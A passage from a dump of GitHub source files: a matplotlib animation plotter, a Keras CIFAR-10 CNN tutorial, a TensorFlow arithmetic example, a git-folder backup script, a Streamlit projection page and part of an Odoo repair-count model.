std_yields\n","repo_name":"convex-community/subgraphs-api","sub_path":"app/services/curve/yields.py","file_name":"yields.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16765341612","text":"\"\"\"Offer a field plotter.\"\"\"\nimport copy\nimport warnings\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Union\n\nimport numpy as np\nimport numpy.typing as npt\nfrom matplotlib import colors\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.axes import Axes\nfrom matplotlib.colorbar import Colorbar\nfrom matplotlib.figure import Figure, SubFigure\nfrom matplotlib.image import AxesImage\nfrom matplotlib.lines import Line2D\nfrom matplotlib.text import Text\n\nfrom nested_grid_plotter.base_plotter import NestedGridPlotter\nfrom nested_grid_plotter.imshow import (\n _apply_default_colorbar_kwargs,\n _apply_default_imshow_kwargs,\n _check_axes_and_data_consistency,\n _scale_cbar,\n)\n\n# pylint: disable=C0103 # does not confrom to snake case naming style\n# pylint: disable=R0913 # too many arguments\n# pylint: disable=R0914 # too many local variables\n\n# Define some types for numpy\nNDArrayFloat = npt.NDArray[np.float64]\nNDArrayInt = npt.NDArray[np.int64]\n\n\ndef _get_nb_frames(nb_frames: Optional[int], nb_steps: int) -> int:\n \"\"\"\n Get the correct number of frames.\n\n Parameters\n ----------\n nb_frames : Optional[int]\n Number of frames to plot. If None, then the number of steps is used.\n nb_steps : int\n Number of steps (data arrays available for plot).\n\n Returns\n -------\n int\n The correct number of frames.\n\n Raises\n ------\n warnings.warn\n If the nb_frames required exceeds the number of steps.\n \"\"\"\n if nb_frames is None:\n return nb_steps\n if nb_frames > nb_steps:\n warnings.warn(\n UserWarning(\n f\"The nb_frames ({nb_frames}) required exceeds the number of steps\"\n f\" available (last dimension of arrays = {nb_steps})!\"\n \" Some images will be repeated.\"\n )\n )\n return nb_frames\n\n\nclass AnimatedPlotter(NestedGridPlotter):\n \"\"\"Nestedgrid plotter with embedded animation support.\"\"\"\n\n _animation: Optional[FuncAnimation]\n\n def __init__(\n self,\n fig_params: Optional[Dict[str, Any]] = None,\n subfigs_params: Optional[Dict[str, Any]] = None,\n subplots_mosaic_params: Optional[Dict[str, Any]] = None,\n ) -> None:\n \"\"\"\n Initiate the instance.\n\n Parameters\n ----------\n fig_params : Optional[Dict[str, Any]], optional\n See :class:`NestedGridPlotter` for other possible arguments.\n The default is None.\n subfigs_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. The default is None.\n subplots_mosaic_params : Optional[Dict[str, Any]], optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n None\n \"\"\"\n _fig_params = dict(constrained_layout=True)\n if fig_params is not None:\n _fig_params.update(fig_params)\n\n super().__init__(_fig_params, subfigs_params, subplots_mosaic_params)\n # self.fig.patch.set_facecolor(\"w\")\n self.init_animations_list: List[Callable] = []\n self.animations_list: List[Callable] = []\n self.animation = None\n\n @property\n def animation(self) -> FuncAnimation:\n \"\"\"Get the animation or raise an attribute error if not defined.\"\"\"\n if self._animation is None:\n raise AttributeError(\"No animation as been defined !\")\n return self._animation\n\n @animation.setter\n def animation(self, animation: Optional[FuncAnimation]) -> None:\n self._animation = animation\n\n def _init_animate(self) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n return [f for f_list in self.init_animations_list for f in f_list()]\n\n def _animate(self, i) -> List[Union[Line2D, AxesImage]]:\n \"\"\"Update the data of the plot.\"\"\"\n return [f for f_list in self.animations_list for f in f_list(i)]\n\n def animate(self, nb_frames: int, blit: bool = True) -> FuncAnimation:\n \"\"\"\n Animate the plot.\n\n Parameters\n ----------\n nb_frames : int\n The number of frames to consider for the animation.\n blit: bool, optional\n Whether blitting is used to optimize drawing. Note: when using blitting,\n any animated artists will be drawn according to their zorder; however,\n they will be drawn on top of any previous artists, regardless of their\n zorder. The default is True.\n\n Returns\n -------\n animation.FuncAnimation\n The animation.\n\n \"\"\"\n # plt.close(self.fig)\n self.animation = FuncAnimation(\n self.fig,\n self._animate,\n init_func=self._init_animate,\n frames=range(nb_frames),\n interval=1,\n blit=blit,\n repeat=False,\n )\n return self.animation\n\n def plot_animated_text(\n self, ax: Axes, x: float, y: float, s: Sequence[str], **kwargs: Any\n ) -> None:\n \"\"\"\n Add a text animation to the given axis.\n\n Parameters\n ----------\n ax : Axes\n Axis to which add the text.\n x : float\n x position of the text.\n y : float\n y position of the text.\n s : Sequence[str]\n Sequence of text value to display.\n **kwargs : Dict[str, Any]\n Optional arguments for the class:`Text`.\n\n Returns\n -------\n None\n\n \"\"\"\n txt: Text = ax.text(x, y, s[0], **kwargs)\n\n def _animate(frame: int) -> List[Text]:\n \"\"\"Update the text value.\"\"\"\n txt.set_text(s[frame])\n return [\n txt,\n ]\n\n # self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_plot(\n self,\n ax_name: str,\n data: Dict[str, Dict[str, Any]],\n nb_frames: Optional[int] = None,\n title: Optional[str] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n ) -> None:\n \"\"\"\n Plot a 1D animated curves.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_name : str\n Name of the axis on which to plot the animation.\n data : Dict[str, Dict[str, Any]]]\n Data to be plotted.\n nb_frames: int\n Number of frames to use in the animation. If None, the second dimension of\n the provided data arrays is used.\n title : Optional[str], optional\n Title to give to the plot. The default is None.\n xlabel : Optional[str], optional\n Label for the xaxis. The default is None.\n ylabel : Optional[str], optional\n Label for the yaxis. The default is None.\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n ax: Axes = self.ax_dict[ax_name]\n\n # store all data in a list\n x_list: List[NDArrayFloat] = []\n y_list: List[NDArrayFloat] = []\n # The results are stored in plot_dict and allow updating the values.\n plot_dict = {}\n\n for label, val in data.items():\n kwargs: Dict[str, Any] = val.get(\"kwargs\", {})\n x = val.get(\"x\", None)\n _val = val.get(\"y\")\n if _val is not None:\n y: NDArrayFloat = _val\n else:\n raise ValueError(\n f'Error with data arguments: for key \"{label}\" y must be given!'\n )\n\n # Generate a series to adjust the y axis bounds without setting\n # y_extend = np.nanmax(y_list) - np.nanmin(y_list)\n y_extend = np.linspace(np.nanmin(y), np.nanmax(y), y.shape[0])\n\n if x is not None:\n x_extend = np.linspace(np.nanmin(x), np.nanmax(x), x.shape[0])\n x_list.append(x.reshape(x.shape[0], -1)) # make sure that x is 2d\n else:\n x_extend = np.arange(y.shape[0])\n plot_dict[label] = ax.plot(x_extend, y_extend, label=label, **kwargs)[0]\n y_list.append(y)\n\n nb_steps: int = y_list[0].shape[1]\n\n # Number of x and y consistency\n if len(x_list) != 0 and (len(x_list) != len(y_list)):\n raise ValueError(\n \"When the x vector is provided, it must be for each y vector!\"\n )\n\n # Check that all arrays have the same number of frames\n if not all((y_list[0].shape[1] == y.shape[1] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same number of steps (last dimension)!\"\n )\n if len(x_list) > 1:\n if not all((x_list[0].shape[1] == x.shape[1] for x in x_list[1:])):\n raise ValueError(\n \"Not all given x arrays have the same number \"\n \"of steps (last dimension)!\"\n )\n\n # Check the dimensions\n if not all((y_list[0].shape[0] == y.shape[0] for y in y_list[1:])):\n raise ValueError(\n \"Not all given y arrays have the same first dimension (n values)!\"\n )\n\n if title:\n ax.set_title(title, fontweight=\"bold\")\n if xlabel:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n def _init() -> List[Line2D]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label in data.keys():\n plot_dict[label].set_ydata(\n np.full(y_list[0][:, 0].size, fill_value=np.nan),\n )\n return list(plot_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[Line2D]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for index, label in enumerate(data.keys()):\n # update x\n if len(x_list) != 0:\n try:\n plot_dict[label].set_xdata(x_list[index][:, data_index])\n except IndexError:\n pass\n # update y\n plot_dict[label].set_ydata(\n y_list[index][:, data_index],\n )\n return list(plot_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n def animated_multi_imshow(\n self,\n ax_names: Iterable[str],\n data: Dict[str, NDArrayFloat],\n fig: Optional[Union[Figure, SubFigure]] = None,\n nb_frames: Optional[int] = None,\n xlabel: Optional[str] = None,\n ylabel: Optional[str] = None,\n imshow_kwargs: Optional[Dict[str, Any]] = None,\n cbar_kwargs: Optional[Dict[str, Any]] = None,\n is_symetric_cbar: bool = False,\n cbar_title: Optional[str] = None,\n ) -> Colorbar:\n \"\"\"\n Plot an animated 2D field with imshow.\n\n The number of frames can be determined automatically from the data.\n\n Parameters\n ----------\n ax_names : str\n List of axis names in which to plot the data. The order of axes must be\n the same as that of the data.\n data : Dict[str, Union[np.ndarray, Dict[str, Any]]]\n Data to be plotted.\n fig: Optional[Figure, SubFigure]\n Which figure to consider for the color bar. By default, use self.fig.\n nb_frames : Optional[int]\n Number of frame to use. By default, it is the number of provided steps,\n that is to say the last dimension of the arrays. If the number of frames\n exceeds the number of steps available, some steps will be repeated once\n or more and a warning is raised.\n xlabel : Optional[str], optional\n Label to apply to all xaxes. The default is None.\n ylabel : Optional[str], optional\n Label to apply to all yaxes. The default is None.\n imshow_kwargs: Optional[Dict[str, Any]] optional\n Optional arguments for `plt.imshow`. The default is None.\n\n Examples\n --------\n Examples can be given using either the ``Example`` or ``Examples``\n sections. Sections support any reStructuredText formatting, including\n literal blocks::\n\n $ python example_numpy.py\n\n Raises\n ------\n ValueError\n If the provided `data` dictionary contains inconsistent arrays.\n\n Returns\n -------\n None\n\n \"\"\"\n axes: list[Axes] = [self.ax_dict[ax_name] for ax_name in ax_names]\n # The number of ax_name and data provided should be the same:\n _check_axes_and_data_consistency(axes, data)\n\n # Add some default values for imshow and colorbar\n _imshow_kwargs: Dict[str, Any] = _apply_default_imshow_kwargs(imshow_kwargs)\n _cbar_kwargs: Dict[str, Any] = _apply_default_colorbar_kwargs(cbar_kwargs, axes)\n\n # store all data in a list\n data_list = []\n # The results are stored in plot_dict and allow updating the values.\n\n images_dict: Dict[str, AxesImage] = {}\n for j, (label, values) in enumerate(data.items()):\n ax = self.ax_dict[ax_names[j]]\n if not len(values.shape) == 3:\n raise ValueError(\n f'The given data for \"{label}\" has shape {values.shape} '\n \"whereas it should be three dimensional!\"\n )\n\n # Need to transpose because the dimensions (M, N) define the rows and\n # columns\n # Also, need to copy the _imshow_kwargs to avoid its update. Otherwise the\n # colorbar scaling does not work properly\n images_dict[label] = ax.imshow(\n values[:, :, 0].T, **copy.deepcopy(_imshow_kwargs)\n )\n data_list.append(values)\n\n ax.label_outer()\n ax.set_title(label, weight=\"bold\")\n if xlabel is not None:\n ax.set_xlabel(xlabel, fontweight=\"bold\")\n if ylabel is not None:\n ax.set_ylabel(ylabel, fontweight=\"bold\")\n\n nb_steps: int = data_list[0].shape[2]\n\n # Check that all arrays have the same number of timesteps\n if not all((nb_steps == x.shape[2] for x in data_list[1:])):\n raise ValueError(\n \"Not all given arrays have the same number of steps (last dimension)!\"\n )\n\n # Colorbar scaling\n norm: Optional[colors.Normalize] = _imshow_kwargs.get(\"norm\")\n if norm is not None:\n vmin: Optional[float] = norm.vmin\n vmax: Optional[float] = norm.vmax\n if isinstance(norm, colors.LogNorm):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n False,\n is_log=True,\n vmin=vmin,\n vmax=vmax,\n )\n elif isinstance(_imshow_kwargs.get(\"norm\"), colors.Normalize):\n _scale_cbar(\n list(images_dict.values()),\n list(data.values()),\n is_symetric_cbar,\n vmin=vmin,\n vmax=vmax,\n )\n\n if fig is None:\n _fig: Union[Figure, SubFigure] = self.fig\n else:\n _fig: Union[Figure, SubFigure] = fig\n\n # pylint: disable=C0123 # use isinstance instead\n cbar: Colorbar = _fig.colorbar(list(images_dict.values())[0], **_cbar_kwargs)\n if cbar_title is not None:\n cbar.ax.get_yaxis().labelpad = 20\n cbar.ax.set_ylabel(cbar_title, rotation=270)\n\n def _init() -> List[AxesImage]:\n \"\"\"Only required for blitting to give a clean slate.\"\"\"\n for label, values in data.items():\n images_dict[label].set_data(\n np.full(values[:, :, 0].T.shape, fill_value=np.nan),\n )\n return list(images_dict.values())\n\n _nb_frames: int = _get_nb_frames(nb_frames, nb_steps)\n\n def _animate(frame_index: int) -> List[AxesImage]:\n \"\"\"Update the data of the plot.\"\"\"\n # subtract -1 to nb_steps and _nb_frames so that when\n # frame_index = 0, we get the first element of x_list, and when\n # frame_index = _nb_frames - 1, we get the last element of x_list.\n data_index: int = int((nb_steps - 1) / (_nb_frames - 1) * frame_index)\n for label in data.keys():\n images_dict[label].set_data(\n data[label][:, :, data_index].T,\n )\n return list(images_dict.values())\n\n self.init_animations_list.append(_init)\n self.animations_list.append(_animate)\n\n return cbar\n","repo_name":"antoinecollet5/nested_grid_plotter","sub_path":"nested_grid_plotter/animated_plotter.py","file_name":"animated_plotter.py","file_ext":"py","file_size_in_byte":17421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37216384037","text":"import matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\n\n# The dataset contains 50,000 training images and 10,000 test images.\n# Loading the dataset:\nprint('CIFAR-10 Dataset!')\n(train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n# CIFAR-10 contains these classes:\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'lorry']\n\n# -----------------------------\n# This function will display the first 16 images of the dataset with their labels:\ndef visualize_data(train_X, train_Y, class_names):\n\n for i in range(16):\n # create subplot:\n plt.subplot(4, 4, i+1)\n plt.xticks([])\n plt.yticks([])\n # plot image with the class name on the x-axis:\n plt.imshow(train_X[i])\n plt.xlabel(class_names[train_Y[i].item()])\n\n # adjust the subplots and show the first 16 images:\n plt.subplots_adjust(left=0.125,\n bottom=0.1, \n right=0.9, \n top=0.9, \n wspace=0.2, \n hspace=0.35)\n plt.show()\n# -----------------------------\n\n# Displaying the first sixteen images within the dataset:\nvisualize_data(train_X, train_Y, class_names)\n\n# Printing information about the loaded dataset:\nprint(f'There are {train_X.shape[0]} images of size {train_X.shape[1:]} in the Training set of the CIFAR-10 Dataset.')\nprint(f'There are {test_X.shape[0]} images of size {test_X.shape[1:]} in the Test set of the CIFAR-10 Dataset.')\n\n\"\"\"Now that the dataset has been verified, we can begin preparing for the training process. First, let's import all that we need:\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.optimizers import SGD\nfrom tensorflow import keras\nimport tensorflow as tf\n\nprint('Keras version:', keras.__version__)\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n\n\"\"\"We now define two functions that will load and process the data in preparation for training:\"\"\"\n\n# Function used to load the dataset:\ndef load_data():\n\n # Loading the built-in CIFAR-10 dataset from Keras:\n (train_X, train_Y), (test_X, test_Y) = cifar10.load_data()\n\n print('The dataset has been loaded:')\n print(f'Train: X={train_X.shape}, Y={train_Y.shape}')\n print(f'Test: X={test_X.shape}, Y={test_Y.shape}')\n\n # Converting the class labels to one hot vectors:\n train_Y = to_categorical(train_Y)\n test_Y = to_categorical(test_Y)\n\n return train_X, train_Y, test_X, test_Y\n \n# -----------------------------\n\n# Function used to prepare the data:\ndef pre_process_data(train_data, test_data):\n\n # Casting pixel values to floats:\n train_data = train_data.astype('float32')\n test_data = test_data.astype('float32')\n\n # normalising pixel values to range [0-1]\n train_data = train_data / 255.0\n test_data = test_data / 255.0\n\n print(f'Train data is in range {train_data.min()} to {train_data.max()}.')\n print(f'Test data is in range {test_data.min()} to {test_data.max()}.')\n\n return train_data, test_data\n\nprint('Done!')\n\n\"\"\"We will also define a function responsible for plotting the curves:\"\"\"\n\n# Function used to plot the curves for loss and accuracy:\ndef plot_curves(history):\n\n # Plotting the loss curve:\n plt.subplot(211)\n plt.title('Cross Entropy')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n # Plotting the training loss (blue):\n plt.plot(history.history['loss'], color='blue', label='train')\n # Plotting the test loss (red):\n plt.plot(history.history['val_loss'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n # Plotting the accuracy curve:\n plt.subplot(212)\n plt.title('Classification Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # Plotting the training accuracy (blue):\n plt.plot(history.history['accuracy'], color='blue', label='train')\n # Plotting the test accuracy (red):\n plt.plot(history.history['val_accuracy'], color='red', label='test')\n # Legend for the plot:\n plt.legend(['train', 'test'], loc='upper left')\n\n plt.subplots_adjust(top=3)\n plt.show()\n\nprint('Done!')\n\n\"\"\"Now we are ready to design our model architecture.\n\nThe architecture comprises **three CONV layers** with **RELU activation functions**, each followed by **Max Pooling** layers. At the end, there is a **fully-connected** classifier that will classify the input into one of 10 outputs, using **cross entropy** as the loss function:\n\"\"\"\n\n# This function defines our neural network:\ndef create_model():\n\n model = Sequential()\n\n # The first conv layer with 32 kernels of 3*3 receiving an input of 32*32*3:\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 64 kernels of 3*3:\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 128 kernels of 3*3:\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # The feature maps are flattened at this point to be passed into fully-connected layers:\n model.add(Flatten())\n\n # Fully-connected layers leading to 10 classes with a softmax activation function:\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(10, activation='softmax'))\n\n # The optimiser is stochastic gradient descent with a learning rate of f 0.001 and a momentum of 0.9:\n optim = SGD(lr=0.001, momentum=0.9)\n\n # The model optimises cross entropy as its loss function and will monitor classification accuracy:\n model.compile(optimizer=optim, loss='categorical_crossentropy', metrics=['accuracy'])\n\n # Printing model summary:\n print(model.summary())\n\n return model\n\nprint('Done!')\n\n\"\"\"Now that all preparations are made and the model has been designed, it is time to start training the model.\n\nFirst, let's load the dataset:\n\"\"\"\n\ntrainX, trainY, testX, testY = load_data()\n\n\"\"\"Now, we pre-process the images using the function we defined earlier:\"\"\"\n\ntrainX, testX = pre_process_data(trainX, testX)\n\n\"\"\"Let's create the model:\"\"\"\n\nmodel = create_model()\n\n\"\"\"The model can now be trained for 20 epochs with a batch size of 64:\"\"\"\n\nhistory = model.fit(trainX, trainY, epochs=20, batch_size=64, validation_data=(testX, testY))\nprint('Done!')\n\n\"\"\"After the training is complete, we can evaluate the model on the test set and obtain the final accuracy level:\"\"\"\n\n_, acc = model.evaluate(testX, testY, verbose=1)\nprint('Accuracy: %.3f' % (acc * 100.0))\n\n\"\"\"We can plot the loss and accuracy curves to better analyse the training process.\n\nThe **blue** curves indicate performance over the **training data** and the *red* curves represent model performance over the *test data*:\n\"\"\"\n\nplot_curves(history)","repo_name":"atapour/keras-dl-examples","sub_path":"simple-cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"22030091439","text":"from __future__ import print_function\nimport tensorflow as tf\nimport os\nimport numpy as np\n\n\ntf.flags.DEFINE_string(\n 'log_dir', os.path.dirname(os.path.abspath(__file__)) + '/logs',\n 'Directory where event logs are written to.')\n\nFLAGS = tf.flags.FLAGS\n\n\nif not os.path.isabs(os.path.expanduser(FLAGS.log_dir)):\n raise ValueError('You must assign absolute path for --log_dir')\n'''----------------------------------------------------------------------------------'''\n\n# tf.constant\n# 定义一些常量\na = tf.constant(5, name=\"a\")\nb = tf.constant(10, name=\"b\")\ntensor_a = 5*tf.ones([5, 5])\ntensor_b = 3*tf.ones([5, 5])\n\n# 一些基本的运算\nx = tf.add(a, b, name=\"add\")\ny = tf.div(a, b, name=\"divide\")\n\n'''----------------------------------------------------------------------------------'''\n\n# Run the session\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter(os.path.expanduser(FLAGS.log_dir), sess.graph)\n print(\"a =\", sess.run(a))\n print(\"b =\", sess.run(b))\n print(\"a + b =\", sess.run(x))\n print(\"a/b =\", sess.run(y))\n\n# Closing the writer.\nwriter.close()\nsess.close()\n\n","repo_name":"AtticusJohnson/TensorFlowLearning","sub_path":"PracticeCode/Tensorflow-Course/1-basic_math_operation.py","file_name":"1-basic_math_operation.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69969433290","text":"import os\r\nimport time\r\nimport zipfile\r\n\r\nworkSpace = \"/Users/alphahinex/workspace\"\r\nbackupRoot = \"/Users/alphahinex/github/trunk/gitbackup/backup\"\r\nweek = time.strftime(\"%w\")\r\nbackupPath = os.path.join(backupRoot, week)\r\n\r\n# clean zip file which is a week ago\r\ndelCommand = \"rm -f \" + os.path.join(backupRoot,week + \".zip\")\r\nos.system(delCommand)\r\n\r\n# get all .git root path\r\nfirstLvs = os.listdir(workSpace)\r\nsrcDirs = []\r\nfor firstdir in firstLvs:\r\n if(os.path.isdir(os.path.join(workSpace,firstdir))):\r\n for secdir in os.listdir(os.path.join(workSpace,firstdir)):\r\n if(secdir.find('git')>0):\r\n if(os.path.isdir(os.path.join(workSpace,firstdir,secdir))):\r\n srcDirs.append(firstdir)\r\n\r\n# copy .git folder\r\nfor folder in srcDirs:\r\n copyCommand = \"mkdir -p \" + os.path.join(backupPath, folder) + \" && \"\r\n copyCommand += \"cp -R \" + os.path.join(workSpace,folder,\".git\") + \" \" + os.path.join(backupPath,folder,\".git\")\r\n os.system(copyCommand)\r\n\r\n# zip the backup folder\r\nfilelist = []\r\nfor root, dirs, files in os.walk(backupPath):\r\n for name in files:\r\n filelist.append(os.path.join(root,name))\r\n\r\nzf = zipfile.ZipFile(os.path.join(backupRoot,week+\".zip\"),\"w\",zipfile.zlib.DEFLATED)\r\nfor fileToZip in filelist:\r\n zf.write(fileToZip)\r\nzf.close()\r\n\r\n# clean temp folder\r\nrdCommand = \"rm -rf \" + backupPath\r\nos.system(rdCommand)","repo_name":"AlphaHinex/trunk","sub_path":"gitbackup/backupgit_unix_py2_v1.py","file_name":"backupgit_unix_py2_v1.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39262820460","text":"import streamlit as st\nimport io\nimport pandas as pd\nimport numpy as np\nfrom custom_download_button import download_button\nfrom inference_utils.plots_for_space import PlotPCA_CLSProjection, PlotUMAP_CLSProjection, PlotPaCMAP_CLSProjection\n\n\neffectordering = {\n 'EC50_algae': {'POP':'POP'},\n 'EC10_algae': {'POP':'POP'},\n 'EC50EC10_algae': {'POP':'POP'}, \n 'EC50_invertebrates': {'MOR':'MOR','ITX':'ITX'},\n 'EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50_fish': {'MOR':'MOR'},\n 'EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} ,\n 'EC50EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} \n }\n\nendpointordering = {\n 'EC50_algae': {'EC50':'EC50'},\n 'EC10_algae': {'EC10':'EC10'},\n 'EC50EC10_algae': {'EC50':'EC50', 'EC10': 'EC10'}, \n 'EC50_invertebrates': {'EC50':'EC50'},\n 'EC10_invertebrates': {'EC10':'EC10'},\n 'EC50EC10_invertebrates': {'EC50':'EC50', 'EC10': 'EC10'},\n 'EC50_fish': {'EC50':'EC50'},\n 'EC10_fish': {'EC10':'EC10'},\n 'EC50EC10_fish': {'EC50':'EC50', 'EC10': 'EC10'} \n }\n\ndef print_space_page():\n col1, col2 = st.columns((1,3))\n with col1:\n st.markdown('## Projection metrics')\n projection = st.selectbox('Projection method', ('PCA','UMAP'))\n species_group = {'fish': 'fish', 'aquatic invertebrates': 'invertebrates', 'algae': 'algae'}\n model_type = {'Combined model (best performance)': 'EC50EC10'}\n \n PREDICTION_SPECIES = species_group[st.radio(\"Select Species group\", tuple(species_group.keys()), on_change=None, help=\"Don't know which to use? \\n Check the `Species groups` section under `Documentation`\")]\n MODELTYPE = model_type[st.radio(\"Select Model type\", tuple(model_type), on_change=None, help=\"Don't know which to use?\\n Check the `Models` section under `Documentation`\")]\n endpoints = endpointordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n effects = effectordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n PREDICTION_ENDPOINT = endpoints[st.radio(\"Select Endpoint \",tuple(endpoints.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Endpoints` section under `Documentation`\")]\n PREDICTION_EFFECT = effects[st.radio(\"Select Effect \",tuple(effects.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Effects` section under `Documentation`\")]\n \n PREDICTION_EXTENDED_DATA = st.checkbox('show predictions outside training data')\n if projection == 'UMAP':\n MIN_DISTNACE = st.number_input('min distance')\n N_NEIGHBORS = st.number_input('n neighbors')\n\n run_prediction = st.button('Predict')\n \n with col2:\n if run_prediction:\n with st.spinner(text = 'Inference in Progress...'):\n if projection == 'PCA':\n fig = PlotPCA_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'UMAP':\n fig = PlotUMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None, n_neighbors=N_NEIGHBORS, min_dist=MIN_DISTNACE)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'PaCMAP':\n fig = PlotPaCMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n\n buffer = io.StringIO()\n fig.write_html(buffer, include_plotlyjs='cdn')\n html_bytes = buffer.getvalue().encode()\n\n download_button_str = download_button(html_bytes, 'interactive_CLS_projection.html', 'Lagging ➡ Download HTML', pickle_it=False)\n st.markdown(download_button_str, unsafe_allow_html=True)\n","repo_name":"StyrbjornKall/TRIDENT_application","sub_path":"space_page.py","file_name":"space_page.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7101812703","text":"from collections import defaultdict\n\nfrom odoo import _, fields, models\n\n\nclass ProductProduct(models.Model):\n _inherit = \"product.product\"\n\n repair_count = fields.Float(\n compute_sudo=True,\n compute=\"_compute_repair\",\n string=\"Repairs\",\n help=\"Number of Repair Orders where the product appears as a Part\",\n )\n in_repair_ids = fields.Many2many(\n comodel_name=\"repair.order\", compute=\"_compute_repair\", store=True\n )\n\n def _compute_repair(self):\n self.repair_count = 0\n product_rma_dict = defaultdict(list)\n [\n product_rma_dict[operation.product_id.id].append(operation.repair_id.id)\n for operation in self.env[\"repair.line\"].search(\n [\n (\"company_id\", \"in\", self.env.company.ids),\n (\"product_id\", \"in\", self.ids),\n ]\n )\n ]\n for product in self:\n if not product.id:\n product.repair_count = 0.0\n continue\n product.in_repair_ids = product_rma_dict.get(product.id, [])\n product.repair_count = len(\n product.in_repair_ids.filtered(\n lambda x: x.state not in (\"draft\", \"cancel\")\n )\n )\n\n def action_product_product_in_rma_list(self):\n domain = [\n (\"id\", \"in\", self.in_repair_ids.ids),\n ]\n context = {\n \"search_default_not_draft\": 1,\n }\n\n action = {\n \"name\": _(\"Repair Orders\"),\n \"type\": \"ir.actions.act_window\",\n \"res_model\": \"repair.order\",\n \"view_type\": \"list\",\n \"view_mode\": \"list,form\",\n \"domain\": domain,\n \"context\": 